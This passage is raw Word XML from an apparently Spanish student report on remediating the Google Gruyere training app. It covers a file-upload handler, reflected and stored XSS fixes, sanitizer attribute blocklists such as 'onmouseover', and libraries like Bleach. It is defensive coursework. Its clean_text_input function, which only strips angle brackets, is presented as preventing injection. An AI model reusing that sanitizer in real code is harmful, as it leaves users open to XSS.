        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    text_input = clean_text_input(text_input)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D85FF3D" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089D9E88" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Save text input to file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D772F1" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    if text_input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61614F7B" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        text_filename = '{}.txt'.format(os.path.splitext(filename)[0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3309E8" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        with open(os.path.join(directory, text_filename), 'w') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0FFC85" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">            f.write(text_input)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3257623E" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D60BBE3" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    (host, port) = http_server.server_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6314EBB9" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    url = 'http://%s:%d/%s/%s/%s' % (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A40681" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        host, port, specials[SPECIAL_UNIQUE_ID], cookie[COOKIE_UID], filename)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139A44BA" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B6073" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    specials['_message'] = message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BFDD32" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    self._SendTemplateResponse('/upload2.gtl', specials, {'url': url})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09956A3C" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44193393" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>def allowed_file(filename):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC5596" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    return '.' in filename and \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC2466" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729D2CC7" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CBB253" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>def clean_text_input(text):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B84E083" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    """Cleans text input to prevent code injection attacks."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C19DB47" w14:textId="2A5919BC" w:rsidR="00E05F95" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    return text.replace('&lt;', '').replace('&gt;', '')</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="69"/>
    <w:p w14:paraId="373CFAD8" w14:textId="396FF720" w:rsidR="00E05F95" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17686B7B" w14:textId="432D804B" w:rsidR="00E05F95" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Hlk128322244"/>
      <w:r>
        <w:t>Que limpia la entrada y solo permite que se suban archivos .pdf o .txt.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="70"/>
    <w:p w14:paraId="439F9391" w14:textId="5BECF5BE" w:rsidR="004C17EA" w:rsidRDefault="004C17EA" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46252591" w14:textId="77777777" w:rsidR="004C17EA" w:rsidRDefault="004C17EA" w:rsidP="004C17EA">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9C7296" w14:textId="77777777" w:rsidR="004C17EA" w:rsidRDefault="004C17EA" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14769A06" w14:textId="6654AF5C" w:rsidR="00D33545" w:rsidRDefault="00D33545" w:rsidP="00D33545">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6F28C0" w14:textId="4F7B3E11" w:rsidR="00D33545" w:rsidRDefault="00D33545" w:rsidP="00D33545"/>
    <w:p w14:paraId="4608F6CE" w14:textId="60F11480" w:rsidR="00D33545" w:rsidRDefault="00D33545" w:rsidP="00D33545"/>
    <w:p w14:paraId="1BAC6046" w14:textId="3EF614E1" w:rsidR="00D33545" w:rsidRPr="00D33545" w:rsidRDefault="00D33545" w:rsidP="00D33545">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0D802C" w14:textId="29D9E17F" w:rsidR="00D33545" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc127812510" w:history="1">
        <w:bookmarkStart w:id="71" w:name="_Toc128034179"/>
        <w:r w:rsidR="00D33545" w:rsidRPr="00610E00">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>XSS Reflejado -&gt;</w:t>
        </w:r>
        <w:bookmarkEnd w:id="71"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26AC814E" w14:textId="77777777" w:rsidR="00564D72" w:rsidRPr="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="21286533" w14:textId="70773FDC" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>La manera más simple de corregir esta vulnerabilidad es usar un sistema de plantilla web, que escape automáticamente la salida y se consciente del contexto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BF124C" w14:textId="77777777" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>-El escape automático se refiere a la capacidad de un sistema o plantilla de desarrollo web para escapar automáticamente la entrada de texto del usuario, para evitar que se ejecuten scripts incrustados en las entradas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2DAD00" w14:textId="77777777" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Si se quisiera hacer manualmente, se tendría que escapar manualmente cada entrada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2952A61A" w14:textId="77777777" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>-Consciente del contexto, se refiere a la capacidad de aplicar diferentes formas de escape según el contexto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BB09C3" w14:textId="77777777" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Debido a que CSS, HTML, URL Y JavaScript utilizan una sintaxis diferente, se necesitan diferentes formas de escape para cada contexto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75528438" w14:textId="77777777" w:rsidR="00564D72" w:rsidRPr="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="372B2097" w14:textId="0C8E06FE" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="3FAEF259" w14:textId="35942363" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="0F1E6BC1" w14:textId="1D1875FA" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="4E72A766" w14:textId="1F8CDB02" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="79BAA53A" w14:textId="0861A98B" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="25B1FC8F" w14:textId="3832C33B" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="0E787AA4" w14:textId="3F058EA4" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="533DF1BC" w14:textId="0A6F9011" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="74F69CB0" w14:textId="33E5F4D7" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="17EE9AF9" w14:textId="37BC0525" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="431E293E" w14:textId="77211054" w:rsidR="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="4A7C5A6E" w14:textId="77777777" w:rsidR="00564D72" w:rsidRPr="00564D72" w:rsidRDefault="00564D72" w:rsidP="00564D72"/>
    <w:p w14:paraId="43FB2081" w14:textId="48B8CAAB" w:rsidR="00D33545" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc127812511" w:history="1">
        <w:bookmarkStart w:id="72" w:name="_Toc128034180"/>
        <w:r w:rsidR="00D33545" w:rsidRPr="00610E00">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Xtored XSS</w:t>
        </w:r>
        <w:bookmarkEnd w:id="72"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7443D164" w14:textId="68C4F046" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A"/>
    <w:p w14:paraId="66428C83" w14:textId="532F4468" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Google Gruyere, tiene una clase Python para gestionar lo que se puede escribir en los formularios, esa clase es: sanitize.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57603DFE" w14:textId="0BE7B393" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD0955">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A0F813A" wp14:editId="7FDD6D13">
            <wp:extent cx="4516676" cy="141027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516676" cy="1410270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="362788CA" w14:textId="74AEA882" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r>
        <w:t>El atributo “onmouseover” no está entre los atributos no permitidos. Si agregamos este    atributo en el código esta ataque ya no funcionaría:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8369F3" w14:textId="1B8ADBA1" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD0955">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17AF315D" wp14:editId="42AA72CB">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0"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0040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3918697C" w14:textId="78938426" w:rsidR="00947868" w:rsidRDefault="00947868" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E41984B" w14:textId="6CAFF997" w:rsidR="00947868" w:rsidRDefault="00947868" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r>
        <w:t>Como podemos comprobar este ataque ahora ya no funciona:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36071828" w14:textId="49368B93" w:rsidR="00947868" w:rsidRDefault="00947868" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C956676" w14:textId="45B50674" w:rsidR="00947868" w:rsidRDefault="00947868" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r w:rsidRPr="00947868">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EDD1CA2" wp14:editId="60876831">
            <wp:extent cx="5400040" cy="5411470"/>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5411470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC56423" w14:textId="4B9F5DF1" w:rsidR="00947868" w:rsidRDefault="00947868" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE3CE7A" w14:textId="4017060F" w:rsidR="00947868" w:rsidRDefault="00947868" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r w:rsidRPr="00947868">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F44CEE1" wp14:editId="021D7B7C">
            <wp:extent cx="5400040" cy="5411470"/>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00040" cy="5411470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E504844" w14:textId="78F128E0" w:rsidR="00947868" w:rsidRDefault="00947868" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56BA00DA" w14:textId="326D2E25" w:rsidR="00947868" w:rsidRDefault="00947868" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r w:rsidRPr="00947868">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="219002DB" wp14:editId="5E224A2F">
            <wp:extent cx="5400040" cy="541147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00040" cy="5411470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E296E" w14:textId="6E584417" w:rsidR="00947868" w:rsidRDefault="00947868" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B390C1C" w14:textId="77777777" w:rsidR="00947868" w:rsidRDefault="00947868" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697BDCAA" w14:textId="10809D16" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r>
        <w:t>Tendríamos que meter cada atributo que no queremos que se pueda ejecutar, lo mejor sería usar una lista blanca estricta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E689B3" w14:textId="77E4A13E" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se podría usar este: </w:t>
      </w:r>
      <w:hyperlink r:id="rId315" w:history="1">
        <w:r w:rsidRPr="009C39EC">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github-com.translate.goog/Vereyon/HtmlRuleSanitizer?_x_tr_sl=auto&amp;_x_tr_tl=es&amp;_x_tr_hl=es&amp;_x_tr_pto=wapp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="190AC9FA" w14:textId="5A6C1B6C" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD0955">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F146768" wp14:editId="5CCFE063">
            <wp:extent cx="5155109" cy="2239280"/>
            <wp:effectExtent l="0" t="0" r="7620" b="889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155109" cy="2239280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADE5EC0" w14:textId="77777777" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r>
        <w:t>Limpiador de HTML para Python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE5CE81" w14:textId="77777777" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r>
        <w:t>Para una buena seguridad lo mejor es confiar en un lenguaje de plantillas y aplicar una tecnología de seguridad diseñada para un sistema de plantillas, Lo más probable es que un limpiador hecho por nosotros no sea una buena solución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E302286" w14:textId="77777777" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r>
        <w:t>Por lo tanto, menciono alguno de los limpiadores HTML conocidos para Python y el lenguaje de plantillas Django.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A94BAB" w14:textId="77777777" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r>
        <w:t>Bleach, es un excelente limpiador de HTML, haciendo todo el trabajo básico de un limpiador. Para un buen funcionamiento dentro de un lenguaje de plantilla como Django, se necesitará una capa adicional proporcionada por un limpiador HTML de Django</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8A28F" w14:textId="77777777" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Limpiador: </w:t>
      </w:r>
      <w:hyperlink r:id="rId317" w:history="1">
        <w:r w:rsidRPr="0047476A">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github-com.translate.goog/mozilla/bleach?_x_tr_sl=auto&amp;_x_tr_tl=es&amp;_x_tr_hl=es&amp;_x_tr_pto=wapp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20110DB6" w14:textId="74FC08CB" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Limpiador HTML de Django: </w:t>
      </w:r>
      <w:hyperlink r:id="rId318" w:history="1">
